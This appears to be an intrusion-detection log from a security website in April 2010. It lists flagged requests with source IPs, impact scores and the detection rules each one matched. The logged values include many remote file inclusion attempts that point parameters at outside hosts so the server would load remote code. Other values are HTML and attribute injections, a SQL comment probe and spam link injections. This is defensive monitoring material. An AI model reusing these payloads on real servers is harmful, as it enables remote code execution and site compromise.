Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0A%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:98.129.136.178
Impact:8
Created:2010-04-20 06:01:21
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121853
Name:REQUEST.page
Value:security/thumbscrew-software-<span style=''background-color:yellow''>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=''background-color:yellow''%3Eusb%3C/span%3E-write-blocker
IP:98.129.136.178
Impact:42
Created:2010-04-20 06:01:20
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121854
Name:GET.page
Value:security/thumbscrew-software-<span style=''background-color:yellow''>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=''background-color:yellow''%3Eusb%3C/span%3E-write-blocker
IP:98.129.136.178
Impact:42
Created:2010-04-20 06:01:20
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121851
Name:REQUEST.page
Value:1--
Page:/i.php?page=1--
IP:98.129.136.178
Impact:6
Created:2010-04-20 06:01:13
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121852
Name:GET.page
Value:1--
Page:/i.php?page=1--
IP:98.129.136.178
Impact:6
Created:2010-04-20 06:01:13
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121850
Name:GET.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:98.129.136.178
Impact:8
Created:2010-04-20 06:00:20
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121849
Name:REQUEST.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:98.129.136.178
Impact:8
Created:2010-04-20 06:00:19
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121847
Name:REQUEST.amp;mode
Value:print//lang.php?lang_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking&amp;mode=print//lang.php?lang_path=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-20 05:13:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121848
Name:GET.amp;mode
Value:print//lang.php?lang_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking&amp;mode=print//lang.php?lang_path=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-20 05:13:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121845
Name:REQUEST.page
Value:security//lang.php?lang_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//lang.php?lang_path=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-20 05:09:48
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121846
Name:GET.page
Value:security//lang.php?lang_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//lang.php?lang_path=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-20 05:09:48
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121843
Name:REQUEST.page
Value:security/networkprinterhacking//lang.php?lang_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking//lang.php?lang_path=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-20 05:09:43
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121844
Name:GET.page
Value:security/networkprinterhacking//lang.php?lang_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/networkprinterhacking//lang.php?lang_path=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-20 05:09:43
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121841
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8072516&CFTOKEN#=60359469#lastvisit={ts '2010-04-19 18:30:07'}#timecreated={ts '2010-04-19 10:31:59'}#hitcount=3#cftoken=60359469#cfid=8072516#
Page:/i.php?page=videos%2Fanti-forensics-occult-computing&utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29&utm_content=Twitter
IP:69.163.176.83
Impact:64
Created:2010-04-20 04:44:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:121842
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8072516&CFTOKEN#=60359469#lastvisit={ts '2010-04-19 18:30:07'}#timecreated={ts '2010-04-19 10:31:59'}#hitcount=3#cftoken=60359469#cfid=8072516#
Page:/i.php?page=videos%2Fanti-forensics-occult-computing&utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29&utm_content=Twitter
IP:69.163.176.83
Impact:64
Created:2010-04-20 04:44:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:121839
Name:REQUEST.codeme
Value:What?, http://carmenelectrasextape.posterous.com/ carmen electra sex tape, 81588,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-20 04:17:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:121840
Name:POST.codeme
Value:What?, http://carmenelectrasextape.posterous.com/ carmen electra sex tape, 81588,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-20 04:17:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:121837
Name:REQUEST.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-20 04:01:37
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121838
Name:GET.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-20 04:01:37
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121835
Name:REQUEST.codeme
Value:Help me to find the, <a href= http://britneyspearssextape.posterous.com/ >Real britney spears sex tape</a>, [url= http://britneyspearssextape.posterous.com/ ]Real britney spears sex tape[/url], tquaha,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 03:53:53
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121836
Name:POST.codeme
Value:Help me to find the, <a href= http://britneyspearssextape.posterous.com/ >Real britney spears sex tape</a>, [url= http://britneyspearssextape.posterous.com/ ]Real britney spears sex tape[/url], tquaha,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 03:53:53
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121833
Name:REQUEST.amp;mode
Value:print//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks&amp;mode=print//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:22:29
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121834
Name:GET.amp;mode
Value:print//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks&amp;mode=print//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:22:29
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121829
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:20:10
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121830
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:20:10
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121831
Name:REQUEST.page
Value:reviews/chaosnetworks//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:20:10
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121832
Name:GET.page
Value:reviews/chaosnetworks//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:20:10
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121827
Name:REQUEST.codeme
Value::-), <a href= http://diflucan.yolasite.com >diflucan</a>, [url= http://diflucan.yolasite.com ]diflucan[/url], 3826,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:30
Created:2010-04-20 03:07:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:121828
Name:POST.codeme
Value::-), <a href= http://diflucan.yolasite.com >diflucan</a>, [url= http://diflucan.yolasite.com ]diflucan[/url], 3826,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:30
Created:2010-04-20 03:07:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:121823
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:01:08
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121824
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:20
Created:2010-04-20 03:01:08
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121825
Name:REQUEST.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:26
Created:2010-04-20 03:01:08
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121826
Name:GET.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:211.236.43.200
Impact:26
Created:2010-04-20 03:01:08
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121819
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:20
Created:2010-04-20 02:59:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121820
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:20
Created:2010-04-20 02:59:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121821
Name:REQUEST.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:26
Created:2010-04-20 02:59:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121822
Name:GET.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:26
Created:2010-04-20 02:59:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121817
Name:REQUEST.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:26
Created:2010-04-20 02:59:12
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121818
Name:GET.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:26
Created:2010-04-20 02:59:12
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121815
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:20
Created:2010-04-20 02:59:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121816
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:209.126.254.139
Impact:20
Created:2010-04-20 02:59:11
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121811
Name:REQUEST.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:26
Created:2010-04-20 02:56:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121812
Name:GET.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:26
Created:2010-04-20 02:56:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121813
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:20
Created:2010-04-20 02:56:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121814
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:20
Created:2010-04-20 02:56:18
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121807
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:20
Created:2010-04-20 02:56:12
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121808
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:20
Created:2010-04-20 02:56:12
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121809
Name:REQUEST.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:26
Created:2010-04-20 02:56:12
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121810
Name:GET.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:110.45.143.142
Impact:26
Created:2010-04-20 02:56:12
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121804
Name:GET.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121805
Name:REQUEST.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121806
Name:GET.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:22
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121799
Name:REQUEST.mode
Value:print //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks&mode=print%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121800
Name:REQUEST.mode
Value:print //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks&mode=print%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121801
Name:GET.mode
Value:print //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks&mode=print%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121802
Name:GET.mode
Value:print //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks&mode=print%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121803
Name:REQUEST.page
Value:reviews/chaosnetworks //include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews/chaosnetworks%20%20//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:26
Created:2010-04-20 02:54:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121795
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:20
Created:2010-04-20 02:54:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
